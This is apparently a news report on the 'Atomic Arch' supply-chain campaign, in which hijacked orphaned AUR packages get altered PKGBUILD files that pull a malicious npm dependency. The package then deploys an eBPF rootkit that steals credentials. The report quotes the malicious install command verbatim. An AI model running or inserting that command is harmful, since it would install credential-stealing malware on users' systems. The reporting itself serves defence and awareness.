Sonatype, a cybersecurity research firm, has identified a malicious campaign specifically targeting Linux systems through a novel exploitation method. The attackers are leveraging a vulnerability in the ownership transfer mechanism of open-source projects to deploy malware discreetly.
This operation, known as “Atomic Arch,” primarily affects the Arch User Repository (AUR), a platform where software developers maintain installation files for various packages. When project maintainers discontinue their work, the associated software becomes an orphaned package, allowing other users to claim ownership and manage these abandoned projects.
The crux of the vulnerability lies in the legitimacy of these packages. Because the package retains its original name and trusted history, users inadvertently download compromised updates, believing them to be safe.
Researchers report that over 20 packages within the AUR have already fallen victim to this campaign. Sonatype has shared its findings, including detailed technical aspects of this ongoing software supply chain threat.
Inside the Attack Chain
Eyad Hasan, a Sonatype engineer, first brought the issue to light. An ensuing investigation uncovered that the attackers are not modifying the source code of the original applications directly; instead, they are altering the build instructions located in a configuration file known as PKGBUILD.
Upon installation or updates, a rogue post-install script executes the command npm install atomic-lockfile minimist chalk, thereby enforcing the download of a malicious dependency called atomic-lockfile from the public npm registry. Remarkably, the hijacked package itself appears fully benign, allowing standard signature-based security tools to overlook the threat. Sonatype Research Labs has flagged this atomic-lockfile dependency, assigning it a high-severity CVSS score of 8.7.
Advanced Stealth Techniques
Further analysis by Sonatype researcher Adam Reynolds revealed that the atomic-lockfile package includes a bundled native Linux binary, which is triggered during the pre-install phase. This binary employs a Linux kernel technology known as eBPF to deploy additional malicious payloads.
Investigations highlighted that this malware loads a specific file, scales.bpf.c, which grants it rootkit-like capabilities. By manipulating the system calls for directory listings, it effectively conceals its files and processes from users. Additionally, it can monitor active systems for debugging tools to thwart analysis by security software.
The malware’s primary objective appears to be credential theft, targeting GitHub keys, SSH credentials, HashiCorp Vault tokens, browser cookies, and saved data from popular communication platforms, including Slack, Discord, Microsoft Teams, and Telegram. Stolen information is then transmitted directly to the attackers through in-built web upload mechanisms.
While some characteristics of this campaign bear similarity to an earlier incident dubbed IronWorm, no official links to a specific hacker group have been established by Sonatype. Cybersecurity experts caution that simply uninstalling the primary package may not eradicate the threat if the deeper system payload has been activated.